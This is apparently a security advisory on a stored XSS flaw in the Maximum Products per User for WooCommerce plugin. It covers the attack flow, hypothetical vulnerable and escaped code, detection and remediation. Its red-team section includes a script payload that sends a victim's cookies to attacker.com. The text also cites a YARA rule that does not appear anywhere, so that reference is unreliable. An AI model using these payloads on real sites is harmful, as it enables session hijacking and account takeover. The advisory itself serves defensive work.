CVE-2025-62096
Executive Summary
CVE-2025-62096 is a Stored Cross-Site Scripting (XSS) vulnerability affecting the WordPress plugin Maximum Products per User for WooCommerce by WPFactory, versions up to and including 4.4.3. This vulnerability allows an authenticated attacker with contributor-level privileges or higher to inject malicious scripts into web pages generated by the plugin. When an administrator or other user views the affected page, the injected script executes in their browser, potentially leading to session hijacking, credential theft, or defacement. The vulnerability stems from improper neutralization of user-supplied input during web page generation. As of this report, no official patch has been released, and no public proof-of-concept (PoC) code is available.

WordPress Ecosystem Context
This vulnerability is specific to the WordPress plugin ecosystem. The plugin is designed to limit the number of products a user can purchase in WooCommerce. The stored XSS occurs within the plugin's admin interface or frontend product display, depending on the input vector. Attackers must have at least Contributor-level access to the WordPress site to exploit this flaw.
CVSS Breakdown & Threat Level
- CVSS Score: 6.5 (Medium)
- Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
- Attack Vector (AV): Network (N) – Exploitable remotely.
- Attack Complexity (AC): Low (L) – No special conditions required.
- Privileges Required (PR): Low (L) – Requires Contributor-level access.
- User Interaction (UI): Required (R) – Victim must view the compromised page.
- Scope (S): Changed (C) – Impact extends beyond the vulnerable component.
- Confidentiality (C): Low (L) – Limited data exposure.
- Integrity (I): Low (L) – Limited ability to modify content.
- Availability (A): Low (L) – Limited impact on service availability.
Threat Level: Medium. While the CVSS score is moderate, the potential for stored XSS in a WordPress admin context can lead to full site compromise if an administrator account is hijacked.
Deep Dive & Mechanics
The vulnerability exists in the maximum-products-per-user-for-woocommerce plugin. The plugin likely fails to sanitize or escape user-supplied input before storing it in the database and later rendering it in an HTML context. Common vulnerable parameters include product limit values, user role names, or custom messages displayed to users.
Attack Flow:
- An attacker with Contributor-level access logs into the WordPress admin panel.
- The attacker navigates to the plugin's settings page (e.g., WooCommerce > Settings > Maximum Products per User).
- The attacker injects a malicious JavaScript payload into an input field (e.g., product limit for a specific user role).
- The plugin stores the unsanitized input in the
wp_optionstable or post meta. - When an administrator or other user views the plugin's settings page or a frontend page that renders the stored value, the malicious script executes.
- The script can steal session cookies, perform actions on behalf of the victim, or redirect to a malicious site.
Root Cause: The plugin uses functions like echo $value or the_field() without applying WordPress escaping functions such as esc_html(), esc_attr(), or wp_kses_post().
Vulnerable vs. Patched Code
Since no patch is available, we can only hypothesize the vulnerable code pattern.
Vulnerable Code (Hypothetical):
// In a settings page or template
echo '<input type="text" name="max_products" value="' . $stored_value . '" />';
Patched Code (Expected):
// Properly escape the output
echo '<input type="text" name="max_products" value="' . esc_attr( $stored_value ) . '" />';
The patched version would use esc_attr() for HTML attribute contexts and esc_html() for general HTML contexts. Additionally, wp_kses_post() should be used when allowing limited HTML in post content.
Exploitation & Lab Setup
Red Team (Exploitation)
Prerequisites:
- A WordPress installation with WooCommerce and the vulnerable plugin (<= 4.4.3).
- A user account with Contributor-level privileges.
Steps:
- Log in as a Contributor.
- Navigate to the plugin settings (e.g.,
/wp-admin/admin.php?page=wc-settings&tab=products§ion=maximum_products). - In the "Maximum Products per User" field for a specific role, enter the following payload:
<script>alert(document.cookie)</script> - Save the settings.
- Log in as an Administrator and navigate to the same settings page.
- The JavaScript executes, displaying the admin's cookies.
Advanced Payload (Session Hijacking):
<script>
fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>
Blue Team (Detection & Hardening)
Detection:
- Monitor for unusual changes to the
wp_optionstable, specifically themaximum_products_per_user_settingsoption. - Look for HTTP requests containing
<script>tags in POST data to plugin settings pages. - Use Web Application Firewall (WAF) rules to block common XSS patterns.
Hardening:
- Immediately disable the plugin until a patch is released.
- Implement Content Security Policy (CSP) headers to restrict script execution.
- Use WordPress security plugins (e.g., Wordfence) to add input validation.
- Restrict Contributor-level access to trusted users only.
Indicators of Compromise (IOCs)
File-Based IOCs:
- Modified
wp_optionstable entries containing JavaScript payloads. - Suspicious entries in the
wp_postmetatable related to the plugin.
Network IOCs:
- Outbound HTTP requests to known malicious domains from the WordPress admin.
- POST requests to
/wp-admin/admin-ajax.phpwith unusual parameters.
Log IOCs:
- WordPress debug log entries showing unescaped output.
- Web server access logs with
%3Cscript%3E(URL-encoded<script>) in the request body.

Remediation & Mitigation
Immediate Actions:
- Disable the plugin until a patched version is released.
- Audit user accounts – Remove any suspicious Contributor-level accounts.
- Scan the database for stored XSS payloads using the YARA rule above.
- Implement a Web Application Firewall (WAF) with rules to block
<script>tags in plugin settings.
Long-Term Fix:
- The vendor (WPFactory) must release a patched version that properly escapes all user inputs using
esc_html(),esc_attr(), orwp_kses_post(). - Apply the principle of least privilege – only grant Contributor access to trusted users.
- Regularly update all WordPress plugins and core.
Workaround:
- If the plugin cannot be disabled, use a WordPress security plugin to add input validation and output escaping at the server level.
